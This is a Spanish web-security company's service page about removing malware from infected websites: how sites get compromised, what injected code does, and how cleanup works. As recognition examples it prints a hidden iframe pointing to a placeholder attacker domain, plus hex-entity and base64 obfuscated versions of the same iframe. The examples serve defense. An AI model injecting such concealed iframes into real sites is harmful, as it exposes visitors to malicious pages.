Eliminar virus en página web. Página web infectada.

Eliminar virus página webEn los últimos tiempos el aumento de páginas web infectadas por código malicioso ha ido en aumento. Hemos recibido muchas llamadas y emails solicitándonos eliminar virus en página web.

Muchos propietarios de las páginas web o bien los webmaster se enteran de que la web está infectada por:

  • Aviso del navegador (Principalmente Google Chrome y Firefox) al intentar entrar a la página web.
  • Un aviso del antivirus al intentar entrar.
  • Aviso de la empresa de hosting de suspensión de la página web o todo el alojamiento por infracción de la seguridad.
  • Email enviado por Google donde se nos informa del problema (Si tenemos la web en Google webmasters).

Con la certeza de que nuestra web está infectada es imprescindible tomar las medidas necesarias para eliminar el código malicioso y evitar futuros ataques.


Proceso de trabajo ante un sitio web infectado con código malicioso

Localización virus en sitio webLimpieza de virus en webComprobación de virus en webProtección código página web
Localización Limpieza Comprobación Protección

¿Cómo entro el virus en mi web?

Utilizan distintos métodos para conseguir acceso a los archivos y así añadir el virus al código. Principalmente nos encontramos con 3 formas de conseguir el acceso:

  1. La manera más común es aprovechar y explotar la vulnerabilidad de un CMS desactualizado o alguno de sus plugins. Por este motivo es necesario estar pendiente de las actualizaciones disponibles para los CMS y sus añadidos.
  2. Otra de las maneras es aprovechar una configuración incorrecta de los permisos en los archivos subidos al FTP para poder hacer modificaciones en ellos.
  3. Utilización de plugins de pago sin pagar. Para ciertos proyectos web hay que utilizar plugins de pago. Algunos desarrolladores sin escrúpulos no pagan y los descargan de cualquier sitio. En un altísimo porcentaje ese plugin vendrá con algún regalito, en forma de virus, bien escondido.

Los hackers utilizan servidores automáticos para comprobar si las páginas web son vulnerables y cuando la han detectado ejecutan el proceso de manera automática para inyectar el código malicioso. A partir de ese momento la web queda marcada y hay que dejar la página web completamente limpia y protegida para evitar nuevos ataques.

Si su página web tiene código malicioso
Contacte con nosotros. El presupuesto es gratis y sin compromiso.

¿Qué hace el virus en mi página web

Resumiendo, nada bueno. Cada virus o código malicioso hace algo distinto pero ninguna buena. Habitualmente nos encontramos con cosas como:

  • Utilización fraudulenta de las funciones mail de PHP para el envío masivo de spam.
  • Uso del hosting para alojar imágenes pornográficas o páginas web dañinas.
  • Instalación de scripts que permiten infectar a los usuarios que se conecten a las páginas infectadas.
  • Lectura y envío de los datos personales que introduce un usuario en tiendas online (Datos de pago incluidos).

Ahora toca limpieza y protección

Aquí viene la parte más complicada, la limpieza. Es muy común encontrar el código malicioso, borrarlo y en unos días volver a tener virus en otra parte del código de la página web. Esto se debe a dos posibilidades: Estamos quitando el virus pero no cerrando la puerta por la que el robot se cuela para infectarnos o bien que el virus está en otro sitio, bien escondido y generando más código malicioso en distintas partes de la web.

La solución no es simplemente eliminar el código malicioso que vemos, hay que buscar el código que no vemos y que está bien escondido para que no sea nada fácil localizarlo.


Ejemplos de código malicioso

Este sería un tipo común de código malicioso que se puede ver en páginas atacadas:

[php]
<iframe src=”http://www.pagina-controlada-por-hacker.com/” style=”visibility: hidden; display: none”></iframe>;
[/php]

El problema es que ese código es sencillo y fácil de buscar entre los archivos. Los hackers han evolucionado y hay variantes que hacen lo mismo. Estos dos ejemplos es lo mismo que el de arriba pero codificado el primero y packeado el segundo. Cuando se ejecutan estos dos códigos hacen lo mismo que el iframe de arriba.

[php]
&amp;#x3C;&amp;#x69;&amp;#x66;&amp;#x72;&amp;#x61;&amp;#x6D;&amp;#x65;&amp;#x20;&amp;#x73;&amp;#x72;&amp;#x63;&amp;#x3D;&amp;#x201D;&amp;#x68;&amp;#x74;&amp;#x74;&amp;#x70;&amp;#x3A;&amp;#x2F;&amp;#x2F;&amp;#x77;&amp;#x77;&amp;#x77;&amp;#x2E;&amp;#x70;&amp;#x61;&amp;#x67;&amp;#x69;&amp;#x6E;&amp;#x61;&amp;#x2D;&amp;#x63;&amp;#x6F;&amp;#x6E;&amp;#x74;&amp;#x72;&amp;#x6F;&amp;#x6C;&amp;#x61;&amp;#x64;&amp;#x61;&amp;#x2D;&amp;#x70;&amp;#x6F;&amp;#x72;&amp;#x2D;&amp;#x68;&amp;#x61;&amp;#x63;&amp;#x6B;&amp;#x65;&amp;#x72;&amp;#x2E;&amp;#x63;&amp;#x6F;&amp;#x6D;&amp;#x2F;&amp;#x201D;&amp;#x20;&amp;#x73;&amp;#x74;&amp;#x79;&amp;#x6C;&amp;#x65;&amp;#x3D;&amp;#x201D;&amp;#x76;&amp;#x69;&amp;#x73;&amp;#x69;&amp;#x62;&amp;#x69;&amp;#x6C;&amp;#x69;&amp;#x74;&amp;#x79;&amp;#x3A;&amp;#x20;&amp;#x68;&amp;#x69;&amp;#x64;&amp;#x64;&amp;#x65;&amp;#x6E;&amp;#x3B;&amp;#x20;&amp;#x64;&amp;#x69;&amp;#x73;&amp;#x70;&amp;#x6C;&amp;#x61;&amp;#x79;&amp;#x3A;&amp;#x20;&amp;#x6E;&amp;#x6F;&amp;#x6E;&amp;#x65;&amp;#x201D;&amp;#x3E;&amp;#x3C;&amp;#x2F;&amp;#x69;&amp;#x66;&amp;#x72;&amp;#x61;&amp;#x6D;&amp;#x65;&amp;#x3E;
[/php]

[php]
PGlmcmFtZSBzcmM94oCdaHR0cDovL3d3dy5wYWdpbmEtY29udHJvbGFkYS1wb3ItaGFja2VyLmNvbS/igJ0gc3R5bGU94oCddmlzaWJpbGl0eTogaGlkZGVuOyBkaXNwbGF5OiBub25l4oCdPjwvaWZyYW1lPgo=
[/php]

Si miran la barra de direcciones de su navegador verán que nuestra página tiene un candado. Ese candado es el certificado de seguridad SSL. Hasta no hace mucho tiempo tener la SSL protegía del código escrito en los ejemplos. Dentro de una página web con SSL activa no pueden ejecutarse iframe sin SSL. Ahora el código inyectado del iframe tiene https y si se ejecuta sobre una web con SSL.


Mi página web tiene virus y quiero que lo solucionéis. ¿Qué tengo que hacer?

Una vez haya detectado o le hayan informado de la existencia de virus en su página web, lo primero es contactar con nosotros. Necesitamos que nos facilite el nombre del dominio para comprobar la existencia de virus y las claves de acceso al alojamiento.

Procederemos a darle un presupuesto gratis y sin compromiso. Si el presupuesto es aceptado nos pondremos a trabajar inmediatamente, es un servicio prioritario para nosotros. Nos iremos poniendo en contacto con ud. a medida que vayamos avanzando para que sepa en todo momento como se encuentra el proceso.

Nuestra misión será eliminar todo el código malicioso sin tener que borrar nada y dejar protegida su página web para que no vuelva a tener problemas en el futuro.

Ir al contenido

Usamos cookies propias y de terceros para realizar análisis de navegación de usuarios.
Si continua navegando, consideramos que acepta su uso. Más información

Los ajustes de cookies de esta web están configurados para "permitir cookies" y así ofrecerte la mejor experiencia de navegación posible. Si sigues utilizando esta web sin cambiar tus ajustes de cookies o haces clic en "Aceptar" estarás dando tu consentimiento a esto.

Cerrar